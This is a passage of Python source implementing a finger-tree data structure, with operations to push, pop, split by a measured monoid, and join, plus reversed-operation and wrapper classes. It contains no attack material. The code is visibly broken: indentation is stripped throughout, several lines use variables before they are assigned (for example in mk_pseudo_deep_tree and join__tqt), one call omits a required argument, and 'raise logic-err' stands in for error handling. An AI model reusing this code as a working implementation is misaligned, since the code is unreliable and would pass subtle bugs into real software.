def unbox_tree(sf, depth, tree, /):
'depth -> tree<depth> -> ((is_deep_tree::bool), (payload::tuple{see args@mk_deep_tree/mk_line_tree}), auto_info)'
is_deep_tree = sf.is_tree_deep(depth, tree)
if is_deep_tree:
(ldigit, mtree, rdigit, auto_info) = sf.unbox_deep_tree(depth, tree)
payload = (ldigit, mtree, rdigit)
else:
(xnode_seq, auto_info) = sf.unbox_line_tree(depth, tree)
payload = (xnode_seq,)
return is_deep_tree, payload, auto_info
def get_auto_info_from_tree(sf, depth, tree, /):
'depth -> tree<depth> -> auto_info'
is_deep_tree = sf.is_tree_deep(depth, tree)
if is_deep_tree:
auto_info = sf.get_auto_info_from_deep_tree(depth, tree)
else:
auto_info = sf.get_auto_info_from_line_tree(depth, tree)
return auto_info
def mk_tree_from_xnode_seq(sf, depth, xnode_seq, /):
'depth -> [xnode<depth-1>] -> tree<depth>'
min_den, max_den = sf.get_min_max_digit_element_number_pair()
def _recur_mk_tree_from_xnode_seq(depth, xnode_seq, /):
sz = len(xnode_seq)
if sz < 2*min_den:
new_tree = sf.mk_line_tree(depth, xnode_seq)
else:
(ldigit, node_seqM, rdigit) = sf.xnode_seq2ldigit_node_seq_rdigit__q(depth, xnode_seq)
new_mtree = _recur_mk_tree_from_xnode_seq(depth+1, node_seqM)
new_tree = sf.mk_deep_tree(depth, ldigit, new_mtree, rdigit)
return new_tree
#end of def _recur_mk_tree_from_xnode_seq(depth, xnode_seq, /):
new_tree = _recur_mk_tree_from_xnode_seq(depth, xnode_seq)
return new_tree
#end of def mk_tree_from_xnode_seq(sf, depth, xnode_seq, /):
def mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(sf, depth, xnode_seqL, mtree, rdigit, /):
'depth -> [xnode<depth-1>] -> tree<depth+1> -> digit<depth> -> tree<depth>'
#(xnode_seqL, mtree, rdigit)
min_den, max_den = sf.get_min_max_digit_element_number_pair()
#def _recur_mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(sf, depth, xnode_seqL, mtree, rdigit, /):
sz = len(xnode_seqL)
if sz <= max_den:
xnode_seqLs = [xnode_seqL]
def _put(xnode_seq, /):
nonlocal sz
xnode_seqLs.append(xnode_seq)
sz += len(xnode_seq)
def _join():
new_xnode_seqL = tuple(itertools.chain.from_iterable(xnode_seqLs))
assert len(new_xnode_seqL) == sz
return new_xnode_seqL
while sz < min_den:
#(xnode_seqLs, mtree, rdigit)
m = sf.may_ipopL__tree(depth+1, mtree)
if m is None:
#(xnode_seqLs, (), rdigit)
(xnode_seqR, auto_info) = sf.unbox_digit(depth, rdigit)
_put(xnode_seqR)
new_xnode_seqL = _join()
#(xnode_seqLs, (), ())
new_tree = sf.mk_tree_from_xnode_seq(depth, new_xnode_seqL)
break
else:
mtree, node = m
xnode_seqM, auto_info = sf.unbox_node(depth, node)
#(xnode_seqLs, xnode_seqM, mtree, rdigit)
_put(xnode_seqM)
#(xnode_seqLs, mtree, rdigit)
else:
#(xnode_seqLs, mtree, rdigit)
if not min_den <= sz <= max_den: raise logic-err #<<== max_nen <= max_den-min_den
#new_mtree = mtree
new_xnode_seqL = _join()
ldigit = sf.mk_digit(depth, new_xnode_seqL)
new_tree = sf.mk_deep_tree(depth, ldigit, mtree, rdigit)
new_tree
else:
ldigit, node_seqL = sf.xnode_seq2ldigit_node_seq__qd(depth, xnode_seqL)
#(ldigit, node_seqL, mtree, rdigit)
new_mtree = sf.join__qt(depth+1, node_seqL, mtree)
#_recur_mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size
#(ldigit, new_mtree, rdigit)
new_tree = sf.mk_deep_tree(depth, ldigit, new_tree, rdigit)
return new_tree
#end of def mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(sf, depth, xnode_seqL, mtree, rdigit, /):
def mk_pseudo_deep_tree__with_xnode_seqR_of_arbitrary_size(sf, depth, ldigit, mtree, xnode_seqR, /):
'depth -> digit<depth> -> tree<depth+1> -> [xnode<depth-1>] -> tree<depth>'
ops = mk_ReversedFingerTreeOps(sf)
return ops.mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(depth, tuple_reversed(xnode_seqR), mtree, ldigit)
#input flip here!!!
def is_empty__tree(sf, depth, tree, /):
'depth -> tree<depth> -> bool'
return sf.is_tree_line(depth, tree) and not sf.get_num_child_xnode_seq_of_line_tree(depth, tree)
def __tail__may_ipopX__top_tree(sf, may, /):
'may (tree<depth=0>, element) -> may (tree<depth=0>, user_obj)'
if may is None:
return None
else:
new_tree, element = may
user_obj, auto_info = sf.unbox_element(element)
return new_tree, user_obj
def may_ipopL__top_tree(sf, top_tree, /):
'tree<depth=0> -> may (tree<depth=0>, user_obj)'
may = sf.may_ipopL__tree(0, top_tree)
return sf.__tail__may_ipopX__top_tree(may)
def may_ipopR__top_tree(sf, top_tree, /):
'tree<depth=0> -> may (tree<depth=0>, user_obj)'
may = sf.may_ipopR__tree(0, top_tree)
return sf.__tail__may_ipopX__top_tree(may)
def may_ipopL__tree(sf, depth, tree, /):
'depth -> tree<depth> -> may (tree<depth>, xnode<depth-1>)'
(is_deep_tree, payload, auto_info) = sf.unbox_tree(depth, tree)
if is_deep_tree:
(ldigit, mtree, rdigit) = payload
(xnode_seq, auto_info) = sf.unbox_digit(depth, ldigit)
min_den, max_den = sf.get_min_max_digit_element_number_pair()
head, tail = xnode_seq[0], xnode_seq[1:]
if len(xnode_seq) > min_den:
tail_ldigit = sf.mk_digit(depth, tail)
tail_tree = sf.mk_deep_tree(depth, tail_ldigit, mtree, rdigit)
m = (head, tail_tree)
elif len(xnode_seq) == min_den:
m1 = sf.may_ipopL__tree(depth+1, mtree)
if m1 is None:
(xnode_seqR, auto_info) = sf.unbox_digit(depth, rdigit)
tail_tree = sf.mk_tree_from_xnode_seq(depth, (*tail, *xnode_seqR))
m = (head, tail_tree)
else:
(new_mtree, shifted_node) = m1
(shifted_xnode_seq, auto_info) = sf.unbox_node(depth, shifted_node)
new_xnode_seqL = (*tail, *shifted_xnode_seq)
if not min_den+1 <= len(new_xnode_seqL) <= max_den-1: raise logic-err
new_ldigit = sf.mk_digit(depth, new_xnode_seqL)
tail_tree = sf.mk_deep_tree(depth, new_ldigit, new_mtree, rdigit)
m = (head, tail_tree)
else:
raise logic-err
else:
(xnode_seq,) = payload
if not xnode_seq:
m = None
else:
head, tail = xnode_seq[0], xnode_seq[1:]
tail_tree = sf.mk_line_tree(depth, tail)
m = (head, tail_tree)
return m
def may_ipopR__tree(sf, depth, tree, /):
'depth -> tree<depth> -> may (tree<depth>, xnode<depth-1>)'
ops = mk_ReversedFingerTreeOps(sf)
return ops.may_ipopL__tree(depth, tree)
def ipushL__top_tree(sf, top_tree, user_obj, /):
'tree<depth=0> -> user_obj -> tree<depth=0>'
element = sf.mk_element(user_obj)
return sf.ipushL__tree(0, top_tree, element)
def ipushR__top_tree(sf, top_tree, user_obj, /):
'tree<depth=0> -> user_obj -> tree<depth=0>'
element = sf.mk_element(user_obj)
return sf.ipushR__tree(0, top_tree, element)
def ipushL__tree(sf, depth, tree, xnode, /):
'depth -> tree<depth> -> xnode<depth-1> -> tree<depth>'
(is_deep_tree, payload, auto_info) = sf.unbox_tree(depth, tree)
if is_deep_tree:
(ldigit, mtree, rdigit) = payload
(xnode_seq, auto_info) = sf.unbox_digit(depth, ldigit)
min_den, max_den = sf.get_min_max_digit_element_number_pair()
if len(xnode_seq) < max_den:
new_xnode_seqL = (xnode, *xnode_seq)
new_ldigit = sf.mk_digit(depth, new_xnode_seqL)
new_tree = sf.mk_deep_tree(depth, new_ldigit, mtree, rdigit)
elif len(xnode_seq) == max_den:
#recur:overflow_nen = sf.get_num_child_xnode_seq_of_new_node_when_push_overflow()
overflow_nen = sf._get_num_child_xnode_seq_of_new_node_when_push_overflow()
num_remain = max_den-overflow_nen
new_xnode_seqL = (xnode, *xnode_seq[:num_remain])
new_node = sf.mk_node(depth, xnode_seq[num_remain:])
new_ldigit = sf.mk_digit(depth, new_xnode_seqL)
new_mtree = sf.ipushL__tree(depth+1, mtree, new_node)
new_tree = sf.mk_deep_tree(depth, new_ldigit, new_mtree, rdigit)
else:
raise logic-err
else:
(xnode_seq,) = payload
new_xnode_seq = (xnode, *xnode_seq)
new_tree = sf.mk_tree_from_xnode_seq(depth, new_xnode_seq)
return new_tree
def ipushR__tree(sf, depth, tree, xnode, /):
'depth -> tree<depth> -> xnode<depth-1> -> tree<depth>'
ops = mk_ReversedFingerTreeOps(sf)
return ops.ipushL__tree(depth, tree, xnode)
r'''outdated by +tmay_mid_xnode
isplit L/R tree
a = auto_info
r = measured_result
isplit L tree:
[nonempty ltree] ==>> [not ok (init r, ltree)]
[nonempty rtree] ==>> [ok (init r, ltree, head rtree)]
isplit R tree:
[nonempty rtree] ==>> [not ok (rtree, init r)]
[nonempty ltree] ==>> [ok (last ltree, rtree, init r)]
#'''
def get_auto_info_from_xnode(sf, depth, xnode, /):
'depth -> xnode<depth-1> -> auto_info #input depth instead of imay_depth!!!'
#input depth instead of depth-1!!!
#check_uint_imay
check_uint(depth)
if depth:
node = xnode
auto_info = sf.get_auto_info_from_node(depth-1, node)
else:
element = xnode
auto_info = sf.get_auto_info_from_element(element)
return auto_info
def __isplitL__xnode_seq(sf, depth, xnode_seq, measurable_ops4auto_info, init_measured_result, measured_result2is_ok, /):
r'''depth -> [xnode<depth-1>] -> measurable_ops<auto_info> -> measured_result -> (measured_result->bool) -> (xnode_seqL::[xnode<depth-1>], measured_result_before_mid_xnode, mid_xnode::xnode<depth-1>, xnode_seqR::[xnode<depth-1>])
precondition:
[nonempty xnode_seq]
[ok(init, xnode_seq)]
#'''
monoid_ops4measured_result = measurable_ops4auto_info.get_monoid_ops4measured_result()
_get_auto_info = sf.get_auto_info_from_xnode
acc_measured_result = init_measured_result
for i, xnode in enumerate(xnode_seq):
auto_info = _get_auto_info(depth, xnode)
#not depth-1!!!
measured_result = measurable_ops4auto_info.measure(auto_info)
old_acc = acc_measured_result
acc_measured_result = monoid_ops4measured_result.assoc_bin_op(old_acc, measured_result)
if measured_result2is_ok(acc_measured_result):
mid_xnode = xnode
measured_result_before_mid_xnode = old_acc
break
else:
i = len(xnode_seq)
raise logic-err#precondition
xnode_seqL, _mid_xnode, xnode_seqR = xnode_seq[:i], xnode_seq[i], xnode_seq[i+1:]
assert mid_xnode is _mid_xnode
xnode_seqL = tuple(xnode_seqL)
xnode_seqR = tuple(xnode_seqR)
return xnode_seqL, measured_result_before_mid_xnode, mid_xnode, xnode_seqR
def isplitL__tree(sf, depth, tree, measurable_ops4auto_info, init_measured_result, measured_result2is_ok, /):
#return (ltree, measured_result_after_ltree, tmay_mid_xnode, rtree, mxrtree)
r'''depth -> tree<depth> -> measurable_ops<auto_info> -> measured_result -> (measured_result->bool) -> (ltree::tree<depth>, measured_result_after_ltree, tmay_mid_xnode::(tmay xnode<depth-1>), rtree::tree<depth>, mxrtree::tree<depth>)
[toList tree === toList ltree ++ toList tmay_mid_xnode ++ toList rtree]
[toList tree === toList ltree ++ toList mxrtree]
[toList mxrtree === toList tmay_mid_xnode ++ toList rtree]
[tmay_mid_xnode === tmay_head mxrtree]
[measured_result_after_ltree === measure(init, ltree)]
[nonempty ltree] ==>> [not ok(init, ltree)]
[ok(init, ltree)] ==>> [empty ltree]
[nonempty tmay_mid_xnode] ==>> [ok(init, ltree ++++ tmay_mid_xnode)]
[empty tmay_mid_xnode] <==> [empty mxrtree] <==> [tree === ltree] <==> [empty tree]or[not ok(init, tree)]
[empty tmay_mid_xnode] ==>> [empty rtree]
[nonempty tmay_mid_xnode] <==> [nonempty tree][ok(init, tree)]
#'''
monoid_ops4measured_result = measurable_ops4auto_info.get_monoid_ops4measured_result()
def _main_isplitL__tree():
if sf.is_empty__tree(depth, tree):
#[empty tree]
empty_tree = tree
ltree = rtree = mxrtree = empty_tree
tmay_mid_xnode = ()
measured_result_after_ltree = init_measured_result
else:
#[nonempty tree]
auto_infoT = sf.get_auto_info_from_tree(depth, tree)
measured_resultT = measurable_ops4auto_info.measure(auto_infoT)
measured_result_IT = monoid_ops4measured_result.assoc_bin_op(init_measured_result, measured_resultT)
if measured_result2is_ok(measured_result_IT):
#[nonempty tree][ok(init, tree)]
#<==>[nonempty tmay_mid_xnode]
ltree, measured_result_before_mid_xnode, mid_xnode, rtree = _recur_isplitL__tree(depth, tree, init_measured_result)
measured_result_after_ltree = measured_result_before_mid_xnode
if sf.is_empty__tree(depth, rtree):
empty_tree = rtree
ltree, mid_xnode = sf.may_ipopR__tree(depth, tree)
rtree = empty_tree
else:
pass
tmay_mid_xnode = (mid_xnode,)
if sf.is_empty__tree(depth, ltree):
empty_tree = ltree
mxrtree = tree
rtree, mid_xnode = sf.may_ipopL__tree(depth, mxrtree)
ltree = empty_tree
else:
mxrtree = sf.ipushL__tree(depth, rtree, mid_xnode)
mxrtree
else:
#[nonempty tree][not ok(init, tree)]
ltree = tree
tmay_mid_xnode = ()
rtree = mxrtree = sf.mk_empty_tree(depth)
measured_result_after_ltree = measured_result_IT
return (ltree, measured_result_after_ltree, tmay_mid_xnode, rtree, mxrtree)
#end of def _main_isplitL__tree():
def _recur_isplitL__tree(depth, tree, init_measured_result, /):
r'''depth -> tree<depth> -> measurable_ops<auto_info> -> measured_result -> (measured_result->bool) -> (ltree::tree<depth>, measured_result_before_mid_xnode, mid_xnode::xnode<depth-1>, rtree::tree<depth>) #MUST xnode, not tmay
precondition:
[nonempty tree]
[ok(init, tree)]
#'''
(is_deep_tree, payload, auto_info) = sf.unbox_tree(depth, tree)
if is_deep_tree:
(ldigit, mtree, rdigit) = payload
auto_infoL = sf.get_auto_info_from_digit(ldigit)
measured_resultL = measurable_ops4auto_info.measure(auto_infoL)
measured_result_IL = monoid_ops4measured_result.assoc_bin_op(init_measured_result, measured_resultL)
if measured_result2is_ok(measured_result_IL):
(xnode_seqL, auto_infoL) = sf.unbox_digit(depth, ldigit)
xnode_seq_LL, measured_result_before_mid_xnode, mid_xnode, xnode_seq_LR = sf.__isplitL__xnode_seq(depth, xnode_seqL, measurable_ops4auto_info, init_measured_result, measured_result2is_ok)
ltree = sf.mk_line_tree(depth, xnode_seq_LL)
measured_result_before_mid_xnode, mid_xnode
rtree = sf.mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(depth, xnode_seq_LR, mtree, rdigit)
else:
auto_infoM = sf.get_auto_info_from_tree(mtree)
measured_resultM = measurable_ops4auto_info.measure(auto_infoM)
measured_result_ILM = monoid_ops4measured_result.assoc_bin_op(measured_result_IL, measured_resultM)
if measured_result2is_ok(measured_result_ILM):
mtreeL, measured_result_before_mid_node, mid_node, mtreeR = _recur_isplitL__tree(depth+1, mtree, measured_result_IL)
mid_xnode_seq, auto_info = sf.unbox_node(depth, mid_node)
mid_xnode_seqL, measured_result_before_mid_xnode, mid_xnode, mid_xnode_seqR = sf.__isplitL__xnode_seq(depth, mid_xnode_seq, measurable_ops4auto_info, measured_result_before_mid_node, measured_result2is_ok)
ltree = sf.mk_pseudo_deep_tree__with_xnode_seqR_of_arbitrary_size(depth, ldigit, mtreeL, mid_xnode_seqL)
measured_result_before_mid_xnode, mid_xnode
rtree = sf.mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(depth, mid_xnode_seqR, mtreeR, rdigit)
else:
auto_infoR = sf.get_auto_info_from_digit(rdigit)
measured_resultR = measurable_ops4auto_info.measure(auto_infoR)
measured_result_ILMR = monoid_ops4measured_result.assoc_bin_op(measured_result_ILM, measured_resultR)
if measured_result2is_ok(measured_result_ILMR):
(xnode_seqR, auto_infoR) = sf.unbox_digit(depth, rdigit)
xnode_seq_RL, measured_result_before_mid_xnode, mid_xnode, xnode_seq_RR = sf.__isplitL__xnode_seq(depth, xnode_seqR, measurable_ops4auto_info, measured_result_ILM, measured_result2is_ok)
ltree = sf.mk_pseudo_deep_tree__with_xnode_seqR_of_arbitrary_size(depth, ldigit, mtree, xnode_seq_RL)
measured_result_before_mid_xnode, mid_xnode
rtree = sf.mk_line_tree(depth, xnode_seq_RR)
else:
raise logic-err
else:
(xnode_seqT,) = payload
xnode_seq_TL, measured_result_before_mid_xnode, mid_xnode, xnode_seq_TR = sf.__isplitL__xnode_seq(depth, xnode_seqT, measurable_ops4auto_info, init_measured_result, measured_result2is_ok)
ltree = sf.mk_line_tree(depth, xnode_seq_TL)
measured_result_before_mid_xnode, mid_xnode
rtree = sf.mk_line_tree(depth, xnode_seq_TR)
return ltree, measured_result_before_mid_xnode, mid_xnode, rtree
#end of def _recur_isplitL__tree
(ltree, measured_result_after_ltree, tmay_mid_xnode, rtree, mxrtree) = _main_isplitL__tree()
return (ltree, measured_result_after_ltree, tmay_mid_xnode, rtree, mxrtree)
#end of def isplitL__tree
def isplitR__tree(sf, depth, tree, measurable_ops4auto_info, init_measured_result, measured_result2is_ok, /):
#return (lmxtree, ltree, tmay_mid_xnode, measured_result_before_rtree, rtree)
r'''depth -> tree<depth> -> measurable_ops<auto_info> -> measured_result -> (measured_result->bool) -> (lmxtree::tree<depth>, ltree::tree<depth>, tmay_mid_xnode::(tmay xnode<depth-1>), measured_result_before_rtree, rtree::tree<depth>)
[toList tree === toList ltree ++ toList tmay_mid_xnode ++ toList rtree]
[toList tree === toList lmxtree ++ toList rtree]
[toList lmxtree === toList ltree ++ toList tmay_mid_xnode]
[tmay_mid_xnode === tmay_last lmxtree]
[measured_result_before_rtree === measureR(rtree, init)]
[nonempty rtree] ==>> [not okR(rtree, init)]
[okR(rtree, init)] ==>> [empty rtree]
[nonempty tmay_mid_xnode] ==>> [okR(tmay_mid_xnode ++++ rtree, init)]
[empty tmay_mid_xnode] <==> [empty lmxtree] <==> [tree === rtree] <==> [empty tree]or[not okR(tree, init)]
[empty tmay_mid_xnode] ==>> [empty ltree]
[nonempty tmay_mid_xnode] <==> [nonempty tree][okR(tree, init)]
#'''
######################
'old api: depth -> tree<depth> -> measurable_ops<auto_info> -> measured_result -> (measured_result->bool) -> (ltree::tree<depth>, rtree::tree<depth>)'
ops = mk_ReversedFingerTreeOps(sf)
ops4auto_info = mk_ReversedMeasurableOps(measurable_ops4auto_info)
(rtree, measured_result_before_rtree, tmay_mid_xnode, ltree, lmxtree) = ops.isplitL__tree(depth, tree, ops4auto_info, init_measured_result, measured_result2is_ok)
#output flip here!!!
return (lmxtree, ltree, tmay_mid_xnode, measured_result_before_rtree, rtree)
def join__qt(sf, depth, xnode_seq, rtree, /):
'depth -> (xnode_seq::[xnode<depth-1>]) -> (rtree::tree<depth>) -> tree<depth>'
if sf.is_tree_line(depth, rtree):
(xnode_seqR, auto_info) = sf.unbox_line_tree(depth, rtree)
new_xnode_seq = (*xnode_seq, *xnode_seqR)
new_tree = sf.mk_tree_from_xnode_seq(depth, new_xnode_seq)
else:
(ldigitR, mtreeR, rdigitR, auto_info) = sf.unbox_deep_tree(depth, rtree)
(xnode_seqR, auto_info) = sf.unbox_digit(depth, ldigitR)
new_xnode_seq = (*xnode_seq, *xnode_seqR)
#(new_xnode_seq, mtreeR, rdigitR)
new_tree = sf.mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(depth, new_xnode_seq, mtreeR, rdigitR)
return new_tree
def join__tq(sf, depth, ltree, xnode_seq, /):
'depth -> (ltree::tree<depth>) -> (xnode_seq::[xnode<depth-1>]) -> tree<depth>'
ops = mk_ReversedFingerTreeOps(sf)
return ops.join__qt(depth, tuple_reversed(xnode_seq), ltree)
#input flip here!!!
def join__tqt(sf, depth, ltree, xnode_seq, rtree, /):
'depth -> (ltree::tree<depth>) -> (xnode_seq::[xnode<depth-1>]) -> (rtree::tree<depth>) -> tree<depth>'
r'''
mk_tree_from_xnode_seq
mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size
mk_pseudo_deep_tree__with_xnode_seqR_of_arbitrary_size
join__qt
join__tq
#'''
def _recur_join__tqt(depth, ltree, xnode_seq, rtree, /):
if sf.is_tree_line(depth, ltree):
(xnode_seqL, auto_info) = sf.unbox_line_tree(depth, ltree)
new_xnode_seq = (*xnode_seqL, *xnode_seq)
new_tree = sf.join__qt(depth, new_xnode_seq, rtree)
elif sf.is_tree_line(depth, rtree):
(xnode_seqR, auto_info) = sf.unbox_line_tree(depth, rtree)
new_xnode_seq = (*xnode_seq, *xnode_seqR)
new_tree = sf.join__tq(depth, ltree, new_xnode_seq)
else:
(ldigitL, mtreeL, rdigitL, auto_info) = sf.unbox_deep_tree(depth, ltree)
(ldigitR, mtreeR, rdigitR, auto_info) = sf.unbox_deep_tree(depth, rtree)
(xnode_seqL, auto_info) = sf.unbox_digit(depth, rdigitL)
(xnode_seqR, auto_info) = sf.unbox_digit(depth, ldigitR)
#(ldigitL, mtreeL, xnode_seqL, xnode_seq, xnode_seqR, mtreeR, rdigitR)
new_xnode_seq = (*xnode_seqL, *xnode_seq, *xnode_seqR)
new_node_seq = sf.xnode_seq2node_seq__dqd(depth, new_node_seq)
#(ldigitL, mtreeL, new_node_seq, mtreeR, rdigitR)
new_mtree = _recur_join__tqt(depth+1, mtreeL, new_node_seq, mtreeR)
#(ldigitL, new_mtree, rdigitR)
new_tree = sf.mk_deep_tree(depth, ldigitL, new_mtree, rdigitR)
return new_tree
#end of def _recur_join__tqt(depth, ltree, xnode_seq, rtree, /):
new_tree = _recur_join__tqt(depth, ltree, xnode_seq, rtree)
return new_tree
#end of def join__tqt(sf, depth, ltree, xnode_seq, rtree, /):
def _xnode_seq2node_seq__nen_count_pairs(sf, depth, xnode_seq, begin, nen2count, /,*, end=None):
if end is None:
end = len(xnode_seq)
nen_count_pairs = sorted(nen2count.items())
node_seq = sf.xnode_seq2node_seq__nen_count_pairs(depth, xnode_seq, begin, end, nen_count_pairs)
return node_seq
def xnode_seq2node_seq__nen_count_pairs(sf, depth, xnode_seq, begin, end, nen_count_pairs, /):
if not 0 <= begin <= end <= len(xnode_seq): raise ValueError
saved_end = end
node_seq = []
for nen, count in nen_count_pairs:
for _ in range(count):
end = begin + nen
if not begin < end <= saved_end: raise ValueError
node = sf.mk_node(depth, xnode_seq[begin:end])
node_seq.append(node)
begin = end
if begin != saved_end: raise ValueError
node_seq = tuple(node_seq)
return node_seq
def xnode_seq2node_seq__dqd(sf, depth, xnode_seq, /):
'depth -> (xnode_seq::[xnode<depth-1>]{len>=2*min_den}) -> (node_seq::[node<depth>]) #see:join__tqt'
sz2 = len(xnode_seq)
nen2count = sf.split_size__case_digit_seq_digit(sz2)
begin = 0
node_seq = sf._xnode_seq2node_seq__nen_count_pairs(depth, xnode_seq, begin, nen2count)
return node_seq
def xnode_seq2ldigit_node_seq__qd(sf, depth, xnode_seq, /):
'depth -> (xnode_seq::[xnode<depth-1>]{len>=1*min_den}) -> (ldigit::digit<depth>, node_seq::[node<depth>]) #see:join__qt/mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size'
#split_size__case_digit_seq
sz1 = len(xnode_seq)
den, nen2count = sf.split_size__case_digit_seq(sz1)
begin = den
ldigit = sf.mk_digit(depth, xnode_seq[:begin])
node_seq = sf._xnode_seq2node_seq__nen_count_pairs(depth, xnode_seq, begin, nen2count)
return ldigit, node_seq
def xnode_seq2ldigit_node_seq_rdigit__q(sf, depth, xnode_seq, /):
'depth -> (xnode_seq::[xnode<depth-1>]{len>=2*min_den}) -> (ldigit::digit<depth>, node_seq::[node<depth>], rdigit::digit<depth>) #see:mk_tree_from_xnode_seq'
#split_size__case_seq
sz2 = len(xnode_seq)
small_den, big_den, nen2count = sf.split_size__case_seq(sz2)
begin = small_den
end = sz2-big_den
ldigit = sf.mk_digit(depth, xnode_seq[:begin])
rdigit = sf.mk_digit(depth, xnode_seq[end:])
node_seq = sf._xnode_seq2node_seq__nen_count_pairs(depth, xnode_seq, begin, nen2count, end=end)
return ldigit, node_seq, rdigit
#end of class IFingerTreeOps(IFingerTreeOps__setting):
#HHHHH
r'''
tuple_reversed
ReversedMonoidOps(IMonoidOps)
ReversedMeasurableOps(IMeasurableOps)
mk_ReversedMonoidOps
mk_ReversedMeasurableOps
mk_ReversedFingerTreeOps
#'''
def tuple_reversed(seq, /):
return tuple(reversed(seq))
_mk_reversed_ops
def mk_ReversedFingerTreeOps(finger_tree_ops, /):
BaseOps = IFingerTreeOps
ReversedOps = ReversedFingerTreeOps
attr2get_original_ops = 'get_original_finger_tree_ops'
ops = finger_tree_ops
return _mk_reversed_ops(BaseOps, ReversedOps, attr2get_original_ops, ops)
#HHHHH
class WrappedFingerTreeOps__setting(IFingerTreeOps__setting):
'vivi UserDict/UserList'
def __init__(sf, finger_tree_ops__setting, /):
check_instance(IFingerTreeOps__setting, finger_tree_ops__setting)
sf.__ops = finger_tree_ops__setting
def get_original_finger_tree_ops__setting(sf, /):
return sf.__ops
#begin of overrides_of_WrappedFingerTreeOps__setting
#begin of wrapper_impl_of_IFingerTreeOps__setting
##################################
##################################
######IFingerTreeOps__setting#####
##################################
##################################
@override
def get_sorted_node_element_numbers(sf, /):
'-> sorted tuple<uint>'
return sf.__ops.get_sorted_node_element_numbers()
@override
def get_node_element_number_frozenset(sf, /):
'-> frozenset<uint>'
return sf.__ops.get_node_element_number_frozenset()
@override
def get_min_max_digit_element_number_pair(sf, /):
'-> (min digit_element_numbers::uint, max digit_element_numbers::uint)'
return sf.__ops.get_min_max_digit_element_number_pair()
@override
def ___split_size__case_digit_seq_digit___(sf, sz, /):
'[2*min digit_element_numbers..] -> {nen:uint} #see:split_size__case_digit_seq_digit'
return type(sf.__ops).___split_size__case_digit_seq_digit___(sf.__ops, sz)
@override
def ___split_size__case_digit_seq___(sf, sz, /):
'[min digit_element_numbers..] -> (den, {nen:uint}) #see:split_size__case_digit_seq'
return type(sf.__ops).___split_size__case_digit_seq___(sf.__ops, sz)
@override
def ___split_size__case_seq___(sf, sz, /):
'[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:split_size__case_seq'
return type(sf.__ops).___split_size__case_seq___(sf.__ops, sz)
@override
def ___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf, /):
'-> num_child_xnode_seq=overflow_nen::nen #see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
return type(sf.__ops).___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf.__ops)
#end of wrapper_impl_of_IFingerTreeOps__setting
#end of overrides_of_WrappedFingerTreeOps__setting
#end of class WrappedFingerTreeOps__setting(IFingerTreeOps__setting):
class IFingerTreeOps__wrapped_setting(WrappedFingerTreeOps__setting, IFingerTreeOps):
pass
class WrappedFingerTreeOps(IFingerTreeOps__wrapped_setting):
'vivi UserDict/UserList'
def __init__(sf, finger_tree_ops, /):
check_instance(IFingerTreeOps, finger_tree_ops)
super().__init__(finger_tree_ops)
#sf.__ops = finger_tree_ops
@property
def __ops(sf, /):
return sf.get_original_finger_tree_ops__setting()
def get_original_finger_tree_ops(sf, /):
return sf.__ops
#begin of overrides_of_WrappedFingerTreeOps
r'''
step of making wrapper_impl_of_IFingerTreeOps
forward call 4 wrapper class
the undering obj/wrapped obj named '__ops'
each abstractmethod decl has form regex'^\s*def .*/):$''
each abstractmethod decl occupy 3 lines
copy all abstractmethod decls to file end
exec below vim q/ search-cmd && q: edit-cmd, to remove non-abstractmethod func
^\(\s*@abstractmethod.*\)\n\(\s*def \s*\)\([a-zA-Z]\w*\)[(]\(\w\+\)\(, \)\?\(.*\), [/][)]:\n\(\s*\)\(\S.*\)
.,$s//\1\r\2\3(\4\5\6, \/):\r\7\8\r\7return \4.__ops.\3(\6)
^\(\s*@abstractmethod.*\)\n\(\s*def \s*\)\(__\w*__\)[(]\(\w\+\)\(.*\), [/][)]:\n\(\s*\)\(\S.*\)
.,$s//\1\r\2\3(\4\5, \/):\r\6\7\r\6return type(\4.__ops).\3(\4.__ops\5)
@abstractmethod$
.,$s//@override
#'''
#begin of wrapper_impl_of_IFingerTreeOps
##################################
##################################
######IFingerTreeOps__setting#####
##################################
##################################
@override
def get_sorted_node_element_numbers(sf, /):
'-> sorted tuple<uint>'
return sf.__ops.get_sorted_node_element_numbers()
@override
def get_node_element_number_frozenset(sf, /):
'-> frozenset<uint>'
return sf.__ops.get_node_element_number_frozenset()
@override
def get_min_max_digit_element_number_pair(sf, /):
'-> (min digit_element_numbers::uint, max digit_element_numbers::uint)'
return sf.__ops.get_min_max_digit_element_number_pair()
@override
def ___split_size__case_digit_seq_digit___(sf, sz, /):
'[2*min digit_element_numbers..] -> {nen:uint} #see:split_size__case_digit_seq_digit'
return type(sf.__ops).___split_size__case_digit_seq_digit___(sf.__ops, sz)
@override
def ___split_size__case_digit_seq___(sf, sz, /):
'[min digit_element_numbers..] -> (den, {nen:uint}) #see:split_size__case_digit_seq'
return type(sf.__ops).___split_size__case_digit_seq___(sf.__ops, sz)
@override
def ___split_size__case_seq___(sf, sz, /):
'[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:split_size__case_seq'
return type(sf.__ops).___split_size__case_seq___(sf.__ops, sz)
@override
def ___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf, /):
'-> num_child_xnode_seq=overflow_nen::nen #see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
return type(sf.__ops).___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf.__ops)
##################################
##################################
###########IFingerTreeOps#########
##################################
##################################
##################################
@override
def ___get_monoid_ops4auto_info___(sf, /):
'-> monoid_ops<auto_info>::IMonoidOps #see:get_monoid_ops4auto_info'
return type(sf.__ops).___get_monoid_ops4auto_info___(sf.__ops)
@override
def ___get_auto_info_from_element___(sf, element, /):
'element -> auto_info #see:get_auto_info_from_element'
return type(sf.__ops).___get_auto_info_from_element___(sf.__ops, element)
@override
